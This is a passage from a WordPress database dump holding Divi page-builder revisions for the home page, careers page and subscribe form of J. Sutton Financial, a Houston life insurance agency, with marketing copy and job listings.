_module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||12px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" custom_margin=\"||152px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" box_shadow_style_button_one=\"preset2\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" box_shadow_style_button_one=\"preset2\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">Info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-03 23:53:07','2023-04-03 23:53:07','',138,'http://cmdev-site1.com/?p=736',0,'revision','',0),(743,1,'2023-04-04 00:04:43','2023-04-04 00:04:43','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_3,1_3,1_3\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_cta title=\"Benefits Specialist\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" header_text_color=\"#000000\" background_layout=\"light\" min_height=\"280px\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\">Service clients across the state of Texas by offering valuable benefits that protect families during troubling times.</p>\n</div>[/et_pb_cta][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_cta title=\"Sales Manager Trainee\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" header_text_color=\"#000000\" background_layout=\"light\" height=\"280px\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\"><span>Learn to lead, train, and set examples for your own team of agents. Work towards monthly goals and collaborate with managers on a daily basis to achieve record breaking results. </span></p>\n</div>[/et_pb_cta][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_cta title=\"Call Center Specialist\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" header_text_color=\"#000000\" background_layout=\"light\" height=\"280px\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\"><span>Assist our agents with appointment scheduling and client outreach. Work side by side with agents to help achieve team goals.</span></p>\n</div>[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-04 00:04:43','2023-04-04 00:04:43','',38,'http://cmdev-site1.com/?p=743',0,'revision','',0),(742,1,'2023-04-04 00:04:29','2023-04-04 00:04:29','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_3,1_3,1_3\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_cta title=\"Benefits Specialist\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" header_text_color=\"#000000\" background_layout=\"light\" min_height=\"280px\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\">Service clients across the state of Texas by offering valuable benefits that protect families during troubling times.</p>\n</div>[/et_pb_cta][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_cta title=\"Sales Manager Trainee\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" header_text_color=\"#000000\" background_layout=\"light\" height=\"280px\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\"><span>Learn to lead, train, and set examples for your own team of agents. Work towards monthly goals and collaborate with managers on a daily basis to achieve record breaking results. </span></p>\n</div>[/et_pb_cta][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_cta title=\"Call Center Specialist\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" header_text_color=\"#000000\" background_layout=\"light\" height=\"280px\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\"><span>Assist our agents with appointment scheduling and client outreach. Work side by side with agents to help achieve team goals.</span></p>\n</div>[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-04 00:04:29','2023-04-04 00:04:29','',38,'http://cmdev-site1.com/?p=742',0,'revision','',0),(741,1,'2023-04-04 00:03:12','2023-04-04 00:03:12','[et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" template_type=\"row\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_contact_form _builder_version=\"4.20.2\" _module_preset=\"default\" _unique_id=\"7e52c826-6adf-4f13-864a-4fde44e0cf1c\" captcha_font=\"|700|on||||||\" captcha_font_size=\"16px\" hover_enabled=\"0\" sticky_enabled=\"0\" title=\"Subscribe Today!\" success_message=\"You\'ve successfully subscribed to our mailing list!\" submit_button_text=\"Subscribe\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_enable_color=\"on\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" box_shadow_style_button=\"preset2\" button_icon=\"&#xe010;||divi||400\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" _builder_version=\"4.16\" global_colors_info=\"{}\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" _builder_version=\"4.16\" global_colors_info=\"{}\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row]','Subscribe Form','','publish','closed','closed','','subscribe-form','','','2023-04-04 00:03:12','2023-04-04 00:03:12','',0,'http://cmdev-site1.com/et_pb_layout/subscribe-form/',0,'et_pb_layout','',0),(748,1,'2023-04-04 00:14:24','2023-04-04 00:14:24','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" 